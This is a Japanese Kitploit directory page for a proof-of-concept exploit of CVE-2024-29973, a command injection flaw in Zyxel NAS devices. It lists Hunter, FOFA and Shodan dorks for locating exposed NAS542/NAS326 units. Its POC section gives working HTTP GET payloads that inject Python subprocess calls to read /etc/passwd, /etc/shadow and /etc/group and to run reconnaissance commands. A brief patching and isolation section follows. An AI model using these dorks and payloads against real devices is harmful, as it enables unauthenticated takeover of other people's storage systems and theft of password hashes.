Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-29973 — Zyxel NASデバイスにおけるコマンドインジェクションの脆弱性に対する概念実証エクスプロイト。巧妙に細工されたHTTPリクエストを介して任意のコマンド実行を実証し、システム乗っ取りやデータ抽出を可能にします。 | Kitploit
ツール/GitHubGitHub/kernel364/cve-2024-29973
組み込みシステムセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集
GitHubkernel364/cve-2024-29973

CVE-2024-29973

Zyxel NASデバイスにおけるコマンドインジェクションの脆弱性に対する概念実証エクスプロイト。巧妙に細工されたHTTPリクエストを介して任意のコマンド実行を実証し、システム乗っ取りやデータ抽出を可能にします。

リポジトリを見る
211年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-29973 - リモートコマンドインジェクションの脆弱性

説明

CVE-2024-29973 は、特定の Zyxel ネットワークデバイスで発見された重大な脆弱性です。この脆弱性により、未認証の攻撃者がファームウェアの不適切な入力検証メカニズムを悪用して、対象デバイス上で任意のコマンドを実行できるようになります。攻撃者は特別に細工された HTTP リクエストをデバイスに送信し、システムレベルのコマンドを注入することで、デバイスの完全な制御を獲得する可能性があります。

Dorks

Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326" FOFA: app="NAS542" || app="ZYXEL-NAS326" SHODAN: http.title:"Zyxel NAS326"

仕組み

コマンドインジェクション:この脆弱性は、デバイスの Web インターフェースの 1 つにおける入力サニタイズの不備に起因します。この欠陥により、攻撃者は HTTP リクエストのパラメータ内に OS コマンドを追加できるようになります。

エクスプロイト例:攻撃者は、以下のような HTTP GET リクエストを通じてコマンドを注入し、任意のコードを実行できます:

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1

影響:悪用に成功すると、システムコマンドを実行できるようになり、デバイスのリモート制御、データ漏えい、ネットワークのさらなる侵害につながる可能性があります。

予防策

この脆弱性に関連するリスクを軽減するには、次の手順に従ってください:

ファームウェアの更新:すべての Zyxel デバイスが最新のファームウェアバージョンに更新されていることを確認してください。Zyxel はこの脆弱性に対処するパッチをリリースしています。定期的に更新を確認し、速やかに適用してください。

ネットワークの分離:脆弱なデバイスを重要なネットワークインフラから隔離してください。必要なサービスのみを公開し、管理インターフェースが公開アクセスできないようにしてください。

ファイアウォールの設定:送受信トラフィックを必須サービスのみに制限してください。Zyxel デバイスへの不要な HTTP アクセスをブロックしてください。

不審なアクティビティの監視:ログ記録および監視ツールを実装し、ログイン試行の繰り返しや異常なトラフィックパターンなどの異常な動作を検出して警告できるようにしてください。

参考文献 National Vulnerability Database - CVE-2024-29973 Zyxel Security Advisory

画像

alt text

POC

/etc/passwd

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1

/etc/shadow

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1

ifconfig

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1

hostname

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1

ip

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1

uname -a

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1

/etc/group

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1
ツールをダウンロード